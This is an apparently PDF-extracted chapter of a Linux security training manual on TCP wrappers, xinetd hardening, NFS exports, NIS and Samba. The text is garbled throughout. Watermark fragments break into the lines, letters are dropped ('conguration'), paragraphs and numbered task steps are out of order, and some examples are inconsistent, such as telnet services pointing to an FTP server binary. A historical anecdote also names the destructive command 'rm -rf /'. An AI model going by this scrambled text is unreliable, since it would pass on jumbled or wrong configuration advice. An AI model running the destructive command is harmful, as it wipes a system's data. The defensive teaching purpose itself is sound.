For the Red Hat, Inc., key, you should see the following output:
gpg-pubkey-db42a60e-37ea5438
PL
IC
AT
iti
attack: An attempt to bypass security controls on a computer. The attack may alter, release, or deny data. Whether an attack will succeed depends on the vulnerability of the computer system and the effectiveness of existing countermeasures.
on
Once you have veried the GPG signature of the update, then you are sure that the contents are official and have not been modied.
Topic 3C
Access Control
In Linux, conguring access control can be accomplished by using TCP wrappers and the xinetd superdaemon. To start, lets look at TCP wrappers.
TCP Wrappers
Ed
T DU PL IC
Firewalls and other perimeter protection schemes provide an excellent means of protecting the entire network from attacks. There will be times when you want more granular control, and want to control access to and from individual services on a single computer. Linux provides the ability to do this at the machine, enabling you to create an additional layer of security at the source of the service. This ability is provided with TCP wrappers and the xinetd daemon. The history behind the TCP wrappers program is worth noting.
st
In
DO
The connecting client does not know that TCP wrappers are in operation. There will never be a message back to the remote client reporting on success or failure.
NO
TCP wrappers work by providing a point between a request for a service and the service itself. This pointthe TCP wrapper daemon (tcpd)answers the requests for network services on behalf of the service. The daemon then consults conguration les and performs security checks before it allows the request to be given to the service. This provides two functional advantages to the network over traditional service controlling systems: The TCP wrappers operate separately from the service or application that the wrappers are protecting. This way, applications and services do not need to be rewritten and can use common conguration les for management.
ru ct
or
The year was 1990, and the location was Eindhoven University of Technology, in Eindhoven, Netherlands. The University was under heavy attack from a Dutch hacker who had obtained root level access. This hacker opened a lot of eyes to the destructiveness of hackers with the simple command rm -rf /. This command can cause considerable damage; it is similar to the format command in MS-DOS. The University employed Wietse Venema in the Mathematics and Computer Science Department. In response to these attacks, he developed a program that could control host access, track, and log intruders. This program is what we now know as TCP wrappers.
AT
E
hacker: A malicious or inquisitive meddler who tries to discover information by poking around. A person who enjoys learning the details of programming systems and how to stretch their capabilities, as opposed to most users who prefer to learn the necessary minimum.
iti
TCP wrapper: A software tool for security which provides additional network logging, and restricts service access to authorized hosts by service.
on
183
TCP Wrappers Configuration Files

Two conguration les are used by TCP wrappers to provide host-based access control: /etc/hosts.deny and /etc/hosts.allow. The default behavior (if there are no rules in either folder) is to provide everyone access to the services. In other words, you need to create some rules if you want control. The rules of these two les must be created in a careful order. This is due to the fact that the system will read from the top down in the le, and will read rules in the allow le before reading the rules in the deny le. Therefore, a specic denial rule for a host, made in the deny le, will not be used if that same host is granted access in the allow le.
<daemon_list>: <client_list>[: spawn <shell_command> ]
Conguring TCP Wrappers
client_list denes the hostname(s), IP address(es), pattern(s), or wildcard(s), each separated by whitespace, to use when a process name matches the requested service.
ru ct st

scnp.securitycertified.net scna.securitycertified.net
LOCALThis wildcard matches any host that does not contain a decimal point character (.). KNOWNThis wildcard matches any host where the hostname and the address are known or where the user is known. UNKNOWNThis wildcard matches any host where the hostname and the address are unknown or where the user is unknown. PARANOIDThis wildcard matches any host where the hostname does not match the host address.
184
In
DO
Wildcards can also be used in the creation of access rules. There are ve wildcards that you can use: ALLThis wildcard matches every client with a given service (or every service with a client).
NO
Likewise, the decimal point can be used with IP addresses. If you have a client_ list of 192.168., then all IP addresses that begin with 192.168 will be grouped together.
DU
PL
The description for client_list mentions pattern(s). Patterns are useful for grouping clients together. The common method for grouping clients is to use the decimal point (.). By using the decimal point, you can identify groups of hosts, either by domain name or by IP address. Placing the decimal point at the leading edge of a string will include all hosts that share that string ending. So the following two examples would be grouped together if the client_list was .securitycertified.net:
or
IC
AT
shell_command denes an optional function to be done or executed if a rule is implemented.
Ed
Where: daemon_list denes the process(es) or wildcard(s), each separated by whitespace.
iti
The default behavior of the access control of TCP wrappers is to grant access. There must be a rule to deny all in hosts.deny, if that is the behavior you want.
The rules in the conguration les are single-line entries. Any line that is blank or that has a comment character (#) will be ignored. The rules have the following elds:
on
host based: Information, such as audit data from a single host which may be used to detect intrusions.
In addition to these wildcards, there is another keyword that can be used in these lines: EXCEPT. The use is logical, as you would anticipate. For example, if you want to have every host from the 192.168.10.0 network, but not the single host 192.168.10.5, then the rule would be:
ALL: 192.168.10.0 EXCEPT 192.168.10.5
ru ct
/etc/hosts.allow ALL:LOCAL ALL: .securitycertified.net EXCEPT hacker1.securitycertified.net ALL: 10.20.23. EXCEPT 10.20.23.45
st
The next example is very restrictive, only allowing a few hosts to have access. In addition, access is variable to specic services on the machine.
/etc/hosts.allow ALL: 172.168.10.54 in.ftpd: 172.168.10.42 in.telnetd: 172.168.10.42 /etc/hosts.deny ALL: ALL
Finally, this third example is also quite restrictive. In this case, the only allowed service is an internal ftp server.
In
DO
NO
/etc/hosts.deny ALL: ALL
T
DU
PL
The following conguration examples show different levels of security on the network. This rst example grants access to all local hosts, all hosts in the securitycertied.net domain, except for hacker1.securitycertied.net, and all hosts in the 10.20.23.0 network, except for 10.20.23.45. For the denial, the hosts.deny conguration specically denies all other hosts.
or
IC
AT
In this example, you might wonder if they are lines granting access or lines denying access. In reality, they are both. The deciding factor is not the line itself, but the location of the line. Mentioned earlier was the fact that there are two conguration les, one called /etc/hosts.deny and the other /etc/hosts.allow. By placing the line in one of the les, you are deciding on the denial of access or the granting of access.
Ed
# all hosts in the local network ALL: LOCAL # all hosts in securitycertified.net, except insecure.securitycertified.net ALL: .securitycertified.net EXCEPT insecure.securitycertified.net # all hosts in the 172.16.23.0 network ALL: 172.16.23. # all local hosts access to the ftp service in.ftpd: LOCAL # all local hosts access to all services, except for the ftp service ALL EXCEPT in.ftpd: LOCAL # single host 10.20.23.45 access to the telnet service in.telnetd: 10.20.23.45
E
185
iti
on
Take a look at the following sample lines. Remember that lines with the (#) character are comment lines, so they will be ignored.
/etc/hosts.allow in.ftpd: LOCAL /etc/hosts.deny ALL:ALL
in.telnetd: 192.168.23.: spawn (/bin/echo %c >> /var/log/telnet.log)
or
DO NO
ru ct
In
st
DU
PL
IC
AT
Here is an example booby trap line, from the hosts.deny le. This line will write a log line that contains client information when a host in the 192.168.23.0/24 network attempts to use Telnet:
Ed
%a %A %c %d %h %H %u
Client IP address. Server IP address. Client information, including user name and hostname, or user name and IP address. Daemon process name. Client hostname. If unavailable, the IP address is used. Server hostname. If unavailable, the IP address is used. Client user name. If unavailable, unknown is listed.
iti
Expansion
Description
on
The last option that we need to mention was listed in the full rule, called shell_ command. This is very often used for what are known as booby traps. Remember, the rule line is service(s):client(s):shell_command. Shell commands use expansions (sometimes called variables) in their execution. Shell-command expansions apply to all shell commands, and include those listed in the following table.
TASK 3C-1
Controlling Access with TCP Wrappers
1.
You have been assigned the project to manage access to certain Linux services on your corporate network. Your manager has given you the following restrictions to implement; in the space provided, create the necessary /etc/hosts.allow and /etc/hosts.deny les. All local hosts should be able to use all services, except for telnet.
All hosts from the securitycertied.net domain should be denied, except for scnp_server.securitycertied.net, which should have access to all services. All hosts from the 172.16.32.0/24 network should be granted access to all services except telnet. All other hosts and services should be denied.
/etc/hosts.allow ALL except in.telnetd: LOCAL ALL except in.telnetd: 172.16.32. ALL: scnp_server.securitycertified.net /etc/hosts.deny ALL: ALL
Ed
T DU PL IC
2.
Do not implement this solution; rather, discuss your results with the rest of the class.
The xinetd Superdaemon
st
The primary conguration information for xinetd is found in the /etc/xinetd.d directory. In this directory, you will nd the specic conguration les for the network services that you want to control. The primary conguration le that manages xinetd is called /etc/xinetd.conf.
In
The xinetd.conf File
DO
Xinetd is used with TCP wrappers to protect the services of the system. TCP wrappers controls the access to the services, and xinetd controls the conguration of the services themselves. The two work together, and are both part of the Red Hat 8 distribution. (Previously, these two components had to be compiled and installed when needed.)
NO
In Linux, sooner or later, you will encounter a superdaemon. A superdaemon is essentially a daemon that controls other daemons. In this case, xinetd is a superdaemon. Even earlier than the xinetd superdaemon was the inetd superdaemon, which handled network access requests. Inetd allowed for the disabling of services that you did not want to use, but provided no further security controls. It has since been replaced by xinetd.
ru ct
or
AT
E
187
iti
on
Objective: To investigate how TCP Wrappers can be used for access control by developing a possible solution for a ctitious scenario.
For this task, make sure that students do not change the actual les on their lab machines, or the success of future activities could be severely compromised.
Conguring xinetd (2 slides)
The /etc/xinetd.conf le contains the conguration settings that are to apply to all services. The default le has several options, including instances, log_type, log_ on_success, log_on_failure, and cps. Figure 3-18 shows an example xinetd.conf le.
Ed or
DO NO
ru ct

log_typesThis variable denes how xinetd should handle logging. The default is to use /etc/syslog.conf and set to /var/log/secure. log_on_successThis variable denes what xinetd will log if the connection is successful. The default is Host IP Address and Process ID of the server process. log_on_failureThis variable denes what xinetd will log if the connection is a failure. The default is Host IP Address. cpsThis variable denes the number of connections per second that are allowed to any one given service. This variable can be entered as two spaceseparated numbersthe rst being the number of connections per second, and the second being the wait period (in seconds) if the max limit has been reached.
In
st
DU
PL
Looking at the defaults in the example le, the following is a breakdown of the options and their meanings: instancesThis variable denes the maximum number of requests for a particular service that can be handled at once.
IC
Figure 3-18: The default xinetd.conf le running on Red Hat Linux 8.0.
AT
iti
on
Lower the number of instances to a service from the default of 60 to 30. You will want to keep an eye on this for services that you grant, such as FTP, so that clients are not denied access. Add a DURATION log for successful use of services by a remote system. This data can be used for tracking purposes. Add an ATTEMPT log for each failed attempt at accessing a service. Add a RECORD log for failed attempts to track information about the remote system. This only works with select services, such as login and nger, that can be security risks when they are running.
Disable all services that you want to have blocked completely. A common example of this is the r services, as they are inherently insecure.
The following example is what the xinetd.conf le might look like once you have made these changes to harden its conguration:
instances = 30 log_type = SYSLOG authpriv log_on_success = HOST PID DURATION log_on_failure = HOST ATTEMPT RECORD per_source = 10 no_Access = 0.0.0.0/0 disabled = rlogin rsh rexec
Ed
T DU PL IC
Add a restriction on the number of connections a single host can make to a service. A recommendation is 10, and this is done using a per_source line.
The xinetd.d Configuration Files
st
service ftp { disable = no socket_type = stream wait = no user = root server = /usr/sbin/in.ftpd nice = 10 }
In
DO
Having separate and unique les in the xinetd.d directory allows for the management of services in simple, small les. Having one single le to manage would get out of control quickly, and would make it more complex to add and remove services. The following example conguration le is for the ftp service:
NO
When the xinetd superdaemon starts, it reads the les in the /etc/xinetd.d directory. These les generally have the same, or similar, name as the service they are related to. The service-specic conguration les have the same le structure as the overall xinetd.conf le you examined earlier.
ru ct
This example shows one possible conguration of a hardened xinetd.conf le. Once you have made the modications to the overall conguration le, you can move into the more granular conguration les of the specic services.
or
AT
E
189
iti
on
The defaults are adequate for many situations, but there are some changes you can make to the xinetd.conf le that will tighten the security of the default operation. The following options are suggested for the le: Create a no-access rule for everyone. This means that access to services will need to be congured on a service-by-service level. If you address this in your TCP wrappers conguration, then this is a redundant step.
This example shows how a simple default conguration le looks. The conguration les generally share common characteristics:
TCP connections usually have a stream socket type, and UDP connections usually have dgram socket types.
They start with the service name as the rst line. This is generally the service name as listed in /etc/services.
The rst line denes the service availability. If you want this service to be unavailable to anyone, you can simply disable it at this point. The second line denes the connection type. Often, this will be either stream or dgram, although there are two other options: raw and seqpacket. Because the connection is set to stream, the wait is set to no, as is the normal case for streams. The user that runs the ftp server is the root account. The server itself is located at /usr/sbin/in.ftpd.
Ed
T DU
The nice command denes the priority level of the server; in this case, a level of 10 is the average level. Levels historically run from -20 to 20, with the lower number being the higher prioritythe highest then is -20.
or st In
Figure 3-19: An example xinetd.d conguration le for the ftp service. Figure 3-19 has had some additions made to the default ftp conguration le. It is worth noting that there are over 40 conguration options that can be made in these les, and not all options can be detailed here, in the interest of time. If you are interested in reading and examining all of the options, please read the xinetd.conf man pages. One of the conguration options is to add to or remove from the existing conguration. This is done using either the += or the -= options. In other words, if you are adding a line such as DURATION to log_on_success, the option is the +=. This will now be added and included in the process of checks for that
DO
ru ct
NO
PL
IC
AT
iti
on
Following the service name are the braces, within which the conguration details are found.
service. Likewise, if you are ready to remove an option, you would use a line such as this: log_on_success -=DURATION. These would be variables that you want to add or remove not only from the conguration le itself, but in conjunction with the xinetd.conf conguration le. The following examples dene lines that can be added to the conguration les to increase security, or to control the access of the system more closely. There is a comment above each line dening the line followed by the conguration line itself.
# Change the log to a defined file, instead of using the default SYSLOG Log_type = FILE /var/log/custom_ftp_service.log # Grant access from only a single network, based on IP Address only_from = 10.20.0.0/16 # Grant access to a single host, based on IP Address only_from = 10.20.23.45 # Grant access to two hosts, based on IP Address only_from = 10.20.23.45 10.20.23.55 # Deny access to a single host, based on IP Address no_access = 10.20.23.45 # Deny access to a single network, based on IP Address no_access = 10.20.23.0/24 # Grant access only during defined hours access_times = 06:00 - 19:00 # Adding the ability to track DURATION on successes log_on_success += DURATION # Removing the option to track the RECORD on failures log_on_failure -= RECORD # Set the priority at a high level (for example, 3) nice = 3 # Add an identifier for the internal ftp server id = internal_ftp # Prevent a process from using large amounts of # the processor. Define the total processor load at 2.5. max_load = 2.5 # Prevent flooding of the system for the same service # requests simultaneously. Limit the connections to 5 # Define the wait for new connections at 45 seconds cps = 5 45
Ed
T DU PL IC
Binding and Redirection
st
Another feature of xinetd is the ability to bind a service to an IP address. This can be a useful feature, even more so if your computer has multiple interfaces or multiple IP addresses. This feature is added by using the bind = IP Address line in the conguration le. The following example is an FTP server that has two interfaces. One interface is for the internal network, and the other is for the external network. The internal network has no restrictions on access to the FTP server, but the external network is allowed to access the server only between 10:00 A.M. and 4:00 P.M. The rst le is the conguration for the internal clients. This is bound to an IP address, and allows only certain IP addresses to connect.
In
DO
ru ct
NO
or
AT
E
191
iti
on
This second le is the conguration for the external clients. Notice that the priority level is a bit lower, and that the cps is a lower value. There are no IP address restrictions, but there is a time restriction.
/etc/xinetd.d/ftp_external service ftp { id = ftp_external disable = no socket_type = stream wait = no user = root server = /usr/sbin/in.ftpd nice = 10 cps = 4 45 bind = 192.168.20.1 access_times = 10:00-16:00 }
Ed
T DU PL IC
st
192
In
In this example, there are two congurations for the telnet service. The rst conguration is for the computer that is connected to the Internet, and the one that will be forwarding the request, which is going to port 3456.
DO
ru ct
These examples show how bind can be used with xinetd. Another feature is called redirection. Redirection allows for a service to redirect requests for the service to a different IP address and port number. A user can be rerouted to a different machine entirely for access to the service, with no notice given to the userthis is designed to be transparent. When binding and redirection are combined, you can create some very custom congurations. For example, you can bind a service to an IP address, then redirect the request for the service to a second machine in the network. This enables a request for a service to go to a computer that is customized to serve just the dened purpose. The second computer does not have to be a Linux machine. All that is required is that it is running the required service, in the right location (the specied port). The right location is mentioned because you can change the port numbers of services, so as long as the second computer is running the desired service on the dened port, any number will do.
NO
or
AT
iti
on
/etc/xinetd.d/ftp_internal service ftp { id = ftp_internal disable = no socket_type = stream wait = no user = root server = /usr/sbin/in.ftpd nice = 7 cps = 5 30 only_from = 192.168.10.0/24 bind = 192.168.10.1 }
The second computer has a conguration similar to a normal telnet conguration le. There are no lines here regarding binding and redirection.
service telnet3456 { id = telnet_internal disable = no socket_type = stream wait = no user = root server = /usr/sbin/in.ftpd bind = 172.16.34.51 port = 3456 }
Ed or
DO NO T DU PL IC
Managing Telnet with xinetd
Setup: For this task, students should work in pairs. You are logged on to Red Hat 8 as root, and a Terminal Window is open. 1. 2. 3. 4. 5. 6. 7. 8. 9. Open Red Hat User Manager, and create a new user named telnettest, with the password of telnetpwd. Then close User Manager. Open the Nautilus File Manager, and navigate to /etc/xinetd.d.
Right-click the telnet conguration le, and open it with Emacs. Emacs is a popular Linux text editor. Enable Telnet, making sure that disable = no is set. Save and close the le.
In a Terminal Window, enter killall -HUP xinetd to kill and restart the xinetd process so that your changes can take effect.
In
Enter telnet <partnerIPaddress> to attempt to telnet into your partners computer. Use the telnettest credentials specied at the start of this task. After a login has been established, enter exit to close the telnet session.
Use Emacs to open the telnet conguration le in /etc/xinetd.d.
st
ru ct
AT
TASK 3C-2
E
193
iti
on
service telnet { id = telnet_external disable = no socket_type = stream wait = no user = root server = /usr/sbin/in.ftpd bind = 192.168.10.1 redirect = 172.16.34.51 3456 }
10. Place the insertion point at the end of the line just before the closing bracket, and press Enter. Add the following line to your conguration: only_from = 10.20.30.40 to restrict usage of the telnet service. This IP address should not exist in the classroom! 11. Save and close the le. 12. Kill and restart the xinetd process so that your changes can take effect. 13. Attempt to telnet into your partners computer. This time the connection is not successful. 14. Close the Nautilus File Manager.
Topic 3D
The next step in securing your Linux machine is to secure any network services, such as NFS, NIS, and Samba, that you have running on it. Lets begin with NFS.
Ed
T DU
Securing Network Services
Conguring NFS
st
Creating the actual object you want to share on the NFS server is a matter of a few short steps. But, before jumping right into the conguration of the shared objects, you should take a moment to look into the les behind NFS, and how NFS works. The three primary conguration les for setting up and using NFS securely are /etc/hosts.deny, /etc/hosts.allow, and /etc/exports. Earlier in this course, you used the /etc/hosts.deny and the /etc/hosts.allow les, so they will not be detailed here (but they will be involved). This leaves /etc/exports as the new le to congure. The /etc/exports is essentially the access control conguration le for the le systems that are to be exported to NFS clients. This le is used by two daemons, the NFS mount daemon (mountd), and the NFS le server daemon (nfsd).
194
In
DO
ru ct
There are two primary components of using NFS, the NFS server and the NFS client. The general process is quite straightforward. The NFS server creates the shared object, which is called the export. The NFS client then mounts the exported object from the NFS server. If your system is running TCP wrappers, the /etc/hosts.allow and /etc/hosts.deny les will be read to identify if a client is allowed to access the NFS server. If the client is granted access through TCP wrappers, the conguration le for the NFS server is /etc/exports.
NFS Server Configuration
NO
PL
The Network File System (NFS) enables hosts to mount partitions on remote computers and use those mounted partitions in the same manner as local partitions. This allows for sharing of ies to authorized users across the network. The fact that they are accessed like local partitions means that neither special passwords nor special access commands are required.
or
IC
AT
NFS
iti
on
# Allow all hosts access to the mount daemon rpc.mountd: ALL
or
DO NO
ru ct
The syntax then is as follows: <directory to share><client1> (options) <client2> (options). The options are dened for the clients, to control their abilities to access the shared directory. There are ve options for client access: roThis option states that the directory access to the client is Read-Only. This is the default. rwThis option states that the directory access to the client is Read and Write. no_root_squashBy default, on the NFS server, any request made by the root account is treated as if it were made by the nobody user account. (The UID of nobody is based on the setting on the NFS server, not the client.) If this option is enabled, then any request made by the root account on the
In
st
DU
PL
Clients who want to use NFS can be dened by using different methods. One is to use the Network Information Service (NIS). NIS will be detailed shortly. Outside of NIS, you can use IP addresses, domain names, subnets, and wildcards.
IC
With the services and daemons dened, you are now ready to get into the main conguration le for the NFS server. The /etc/exports le contains a mount point to the object to be shared and a list of the machines or other clients that are allowed to mount the le system.
AT
E
195
Finally, on the service end, NFS depends on the portmapper daemon. This daemon is called either portmap or rpc.portmap. Portmap converts Remote Procedure Calls (RPC) program numbers into DARPA protocol port numbers. When any RPC server starts, it lets portmap know what port it is listening to and the RPC program numbers it will serve. If a client calls an RPC program number, it checks with portmap to nd the port number to send RPC packets to. Because NFS uses RPC, portmap is a requirement.
Ed
iti
DARPA: Defense Advanced Research Projects Agency.
The nfsd daemon runs on the NFS server and handles the client requests for le system operations. Although the details of each are beyond the scope of this book, there are a few other daemons that are used in serving NFS. All told, there are ve daemonsrpc.nfsd, rpc.lockd, rpc.statd, rpc.mountd, and rpc.rquotad. These daemons are part of the nfs-utils package, and are usually found in the /sbin or in the /usr/sbin directory.
on
The mountd program is used in NFS when the server receives a mount request from an NFS client. It checks the /etc/exports le for access rights, and if access is permitted, mountd creates a le-handle request for the requested directory, and adds a single entry to the /etc/rmtab le. When an unmount request is received, mountd removes the clients entry from /etc/rmtab. (The /etc/rmtab le contains a listing of clients that have mounted remote le systems from the local machine.) Mountd can be started in xinetd, and can be controlled by using TCP wrappers. For example, if you want all users to have access to the mountd daemon, add these lines to the /etc/hosts.allow le:
remote machine is given the same level of access as the root account on the NFS server. For this reason, this setting is not recommended. no_subtree_checkIf you want to export only part of a volume, a check is made that the le the NFS client is requesting is an appropriate part of the volume. If the whole volume is exported, unchecking this option can increase the transfer rate. syncThe command exportfs (part of the syntax of NFS) can use asynch and synch methods of informing the NFS client that a Write operation has nished. In the case of synch, the server replies to the client indicating a successful write has nished. In the case of asynch, the reply is sent to the client once the request is processed, instead of waiting for the Write operation to nish.
Here are a few examples of what lines in the /etc/exports le might look like:
# Export /R&D to IP Address 172.16.55.63 with read # and write access /R&D 172.16.55.63(rw) # Export /Policy to the entire 172.16.55.0/24 network # with read access /Policy 172.16.55.0/255.255.255.0(ro) # Export /Tech to the 192.168.20.0/24 network # allowing root access, and read and write access /tech 192.168.20.0/24(rw) no_root_squash
or
DO NO
ru ct
In
st
DU
You can see that the options are presented in a simple-to-use GUI that provides elds to ll in and radio buttons to congure the shared directory. Remember that when you are using this tool, you can access and congure this information using any browser.
PL
Just as with other conguration options in Linux, there are several methods to setting up NFS. You have examined some of the command lines, programs, and daemons that are involved in using NFS. One of the graphical methods of working with NFS is through the Webmin Web-based administrative tool you installed earlier in the lesson. Figure 3-20 shows Webmins window for creating a new exported directory.
IC
AT
Configuring NFS Exports
Ed
iti
on
Ed
Figure 3-20: Using Webmin to create an exported directory. Webmin provides for one option of conguring NFS, and you should explore its abilities. In this section, however, you are going to perform tasks using the tools built in to the Red Hat operating system.
or
DO NO
ru ct
In
st
T
DU
PL
The tool to use in Red Hat is called NFS Server, and it is found by choosing Server Settings from the Red Hat Main Menu, or by entering the command redhat-cong-nfs in a Terminal Window. Figure 3-21 shows the NFS Server tool.
IC
AT
E
197
iti
on
Ed
Figure 3-21: Red Hats NFS Server Conguration tool.
ru ct st In
Figure 3-22: Adding an NFS Server share in the NFS Server conguration tool. The Basic tab has just a few elds to ll out to create the share. In the Directory eld, you ll in the directory that you want to share (be sure that the directory actually exists!). In the Hosts eld, you ll in the hosts that are to access the share. Then, select the permission level you want to grant for the share. The General Options tab has several more elds to ll out, but none that are required to create the share. Finally, the User Access tab presents a few more elds you can ll out, such as the previously mentioned no_root_squash.
DO
NO
DU
PL
In this tool, there are only a few primary options. The rst one to examine is the process of adding a share. To do this, simply click the Add button to display the following window, where the share information can be dened.
or
IC
AT
iti
on
If you want to modify a currently existing NFS share, simply open the NFS Server conguration tool, select the rule, and click Properties. Likewise, to delete a rule, simply select the rule, and click Delete. At any time, you can check the implementation of the NFS shares you are creating by looking in the /etc/exports le, to be sure the congurations are as you were expecting. All applied changes in the server tool will be visible in the /etc/ exports le.
From the NFS client standpoint, the conguration is even more streamlined. The client computer requires portmap, rpc.statd, and rpc.lockd to be running, just as they are required on the server. These services should be congured to start at the bootup process. Once those services are enabled, then the client conguration can happen. There are a few ways to congure the client to use NFS. The rst option is to use the default mount command to mount the exported directory. Even though this is a simple process, there is a downside to that conguration optionevery time the system restarts, the root account will need to enter the mount command and reconnect to the shared directory. Furthermore, the root account is required to unmount the shared directory every time the system shuts down. Here are a couple of examples to show the conguration of a standard mount command for an exported directory.
# NFS Server 10.20.23.45, exporting /home is # mounted to the localhost in /tmp/45/home mount 10.20.23.45:/home /mnt/tmp/45/home # NFS Server host1.example.com, exporting /test is # mounted to the localhost in /test mount host1.example.com:/test /test
Ed
T DU PL IC
Mountpoint is the mount location on the local host. Fs-type is the le system type; here, it will be nfs. Dump is usually 0 for NFS shares.
Options is the options, such as the (ro) or (rw) permissions.
st
Fsckorder is usually 0 for NFS shares.
Host1.example.com:/scnp /mnt/certs/scnp nfs rw 0 0
In
The following is an example of an NFS client /etc/fstab line. This line states that there is an NFS server exporting a directory at host1.example.com/scnp, the local mount point is /mnt/certs/scnp, and the access permissions are read and write.
DO
ru ct
As was mentioned, the standard mount commands are to be entered by the root account upon the system starting up, and the mounts are to be unmounted by the root account as the system shuts down. It would be more efficient in many situations for that process to be automatic, and not require the manual input of the root account. This is done by adding the NFS le systems to the /etc/fstab le. This way, NFS mounts are added when the system starts up, in the same manner that local le systems start. The basic syntax of the /etc/fstab le is <device> <mountpoint> <fs-type> <options> <dump> <fsckorder>, where: Device is the location of the NFS exported directory.
NO
or
AT
E
199
iti
on
TASK 3D-1
Sharing Data with NFS
1. 2. 3. 4. 5. 6. 7. 8. 9.
Create a directory called /nfs_share.
Add les and/or directories to the new folder by creating new les or copying them from elsewhere.
Click the Add button.
Change the permissions to Read and Write. In the Hosts eld, enter the IP address of your partners computer.
ru ct st In
Securing NFS
If you are denied access to the les, check the permissions on the nfs_ share directory. The Others must have Read permissions in order to see the les in the NFS share.
As you can see, NFS provides a straightforward method of sharing les and directories between hosts. You might also have seen how there are very little security controls in place. You will need to take advantage of the available security controls in order to provide a safe NFS environment.
DO
NO
13. Browse in your /mnt/nfs1 directory to see what les you now have access to.
DU
12. In a Terminal Window, enter mount a.b.c.d:/nfs_share /mnt/nfs1 to mount to your partners NFS share. Be sure to replace a.b.c.d with your partners IP address.
PL
11. Create a directory named /mnt/nfs1.
IC
10. Close the NFS Server Conguration tool, saving changes if prompted.
or
Click the Apply button to force the changes to take effect. If you are prompted to start the NFS Service, click Yes.
AT
Click OK to accept the settings, and to close the Add NFS Share window.
Ed
In the Directory eld, browse to your nfs_share directory. You can also type the directory name into this eld.
iti
From the Red Hat Main Menu, choose Server SettingsNFS Server to open the NFS Server Conguration tool.
on
Setup: For this task, students should work in pairs. You are logged on to Red Hat 8 as root, and a Terminal Window is open.
You might have noticed that there were no authentication measures in the process of using NFS. The closest was having the right IP address. If your ID matches the one that is assigned to the export in the NFS server, you are granted access. Other problems can exist with User IDs. For example, assume User1 on the NFS Server has a UID of 1234 and creates a le in a directory that is exported. User1 then sets the permissions so that only User1 has access to this le. If User2 (on another machine) also has a UID of 1234 and mounts the exported directory, User2 will have access to the object that was previously secured. Dont despair, however; you can make NFS more secure than the default!
/etc/hosts.deny portmap: ALL
ru ct
/temp/db23/ 192.168.10.0/24(rw) /temp/db23/ 192.168.10.0/24 (rw)
st
After you create your NFS shares, regardless of how you create them, be sure that you verify the exporting is as desired. This can be done quickly from a Terminal Window by using the command showmount -e <hostname>.
In
DO
NO
The difference is so minor you might not even see it at rst. Note that in the rst line, there is no space between the network address and the permissions, but in the second line there is a space. This space makes all the difference. Adding the space, as in the second example, sets the permissions as exporting to everyone, even though an address is dened.
DU
Even though it may seem straightforward, another issue to watch out for is making mistakes in typing in what you want to be exported. A simple syntax error can export volumes that you did not want exported. Consider the ramications of the following two lines, where there are slight differences:
PL
IC
/scnp 192.168.10.0/24(ro) /scnp/results 192.168.10.0/24(noaccess)
or
AT
Another issue with NFS is that if you export a directory, you are exporting the subdirectories in that main directory. From a security perspective, this can cause obvious issues; in this case, the unique permissions that apply to the lines in /etc/ exports. In this example, you want to provide access to the 192.168.10.0/24 network for the main exported directory, /scnp. However, you do not want the 192.168.10.0/24 network to have access to the /scnp/results directory.
Ed
/etc/hosts.allow portmap: 172.16.23.0/16
E
201
iti
The primary service to secure for NFS is the portmap service. To start, be sure the portmap is protected by TCP wrappers, as per your design. It is recommended that the portmap service is provided only to those who specically need it. If only a small section of your internal network needs to use NFS, then your portmap-specic TCP wrappers les will look something like this:
on
TASK 3D-2
Verifying Export Permissions
Setup: You are logged on to Red Hat 8 as root. 1. 2. Create four directories named /NFS_1 through /NFS_4.
Use the NFS Server Conguration tool to create the following exported directories: Directory: /NFS_1 ; Host: 192.168.10.1 ; Permissions: Read-Only Directory: /NFS_2 ; Host: 172.16.10.2 ; Permissions: Read-Only
3. 4. 5.
Apply the changes, and close the NFS Server Conguration tool. Save changes if you are prompted to do so. Navigate to the /etc/exports le, and open it in Emacs. Add the following lines:
/NFS_3/ 192.168.10.1(ro,sync) /NFS_4/ 172.16.10.2(rw,sync) 6. 7. 8. 9. Save and close the le.
Ed
T DU
st
NIS
202
In
Network Information Service (NIS) was formerly called the Yellow Pages (or simply YP), and it is unlikely that you will be running it in a production environment. There are different versions of NIS, most notable NIS and NIS+. NIS+ has increased security built into it; however, development work on NIS+ has stopped, and is not often implemented in a production environment.
DO
ru ct
In the Terminal Window, enter showmount -e <hostname> to check the export permissions. If the export permissions are not displayed by using the showmount command, you can view them in the /etc/exports le or in the NFS Server Conguration Tool.
NO
10. Observe the difference in the permissions for NFS_4 versus the others you added.
PL
Read the response provided on the screen.
IC
In a Terminal Window, enter exportfs -rav to enact the changes in the le that you manually added.
or
AT
iti
on
NIS itself uses RPC and the client/server model to allow for a distributed information of login names/passwords/home directories (/etc/passwd) and group information (/etc/group). The function of this is that you can have your password information listed in the NIS Server database, and you can log in to any machine on the network that has the NIS client running.
Any time there is a change to the NIS maps, the Slave Servers are notied, from the yppush program, and synchronize their databases. NIS clients do not receive this information, only the servers.
or
DO NO
In
Second was that the client software itself would often crash and cause problems with PC applications.
crash: A sudden, usually drastic failure of a computer system.
st
This touches on one of the problems that people had with le sharing before Samba. A Linux machine already running as an NFS server could share les with Windows machines, but the Windows client was required to run PC-NFS to gain access to the NFS shares. There were two primary problems with the NFS way of sharing les: First, there was a cost attached to the use of the third party PC-NFS client software.
Samba is a suite of programs that makes use of the Server Message Block (SMB) Protocol. It is often used to solve the communication problems that Linux and Windows machines normally have when trying to share les. Samba makes it possible to share directories with Windows machines in a simple and straightforward manner that does not require the Windows clients to use anything other than their built-in networking utilities.
ru ct
DU
PL
What is Samba?
IC
AT
As networks become more complex, and as attacks get more sophisticated, you will likely want to migrate to a more secure means of authentication across the network. That means is Kerberos. Kerberos uses Secret-Key cryptography to provide for secure communications. Detailed discussions of NIS and Kerberos are both beyond the scope of this course.
Ed
The /etc/passwd and /etc/group les are converted to DBM format by using the ASCII-to-DBM conversion software makedbm. The Master NIS Server then has a DBM and ASCII version of the databases. The database is called an NIS map. For example, the NIS map /var/yp/Marketing might be for the domain Marketing.
E
203
iti
In a network running NIS, there must be (at the minimum) one server running as the NIS Server. The NIS Server is serving an NIS domain, which is a logical name for the grouping of computers that will use NIS together. Do not confuse this with a DNS domain name, or with a Microsoft domain. The NIS domain is unique to the function of NIS. The NIS terminologies of the servers that serve the domain are Master and Slave. There is one Master NIS Server and multiple Slave NIS Servers.
on
NIS Operation
More Uses for Samba

All right, you now know that Samba can help you share les on a Linux machine so that Windows clients can access them. What if you want to access a shared directory on a Windows machine from a Linux machine? Fortunately, that ability is also built into Samba with the smbclient. To use smbclient to access a Windows share called marketing, on a machine called fuzzybunny, with the user account johni, you would enter the following command into a Terminal Window:
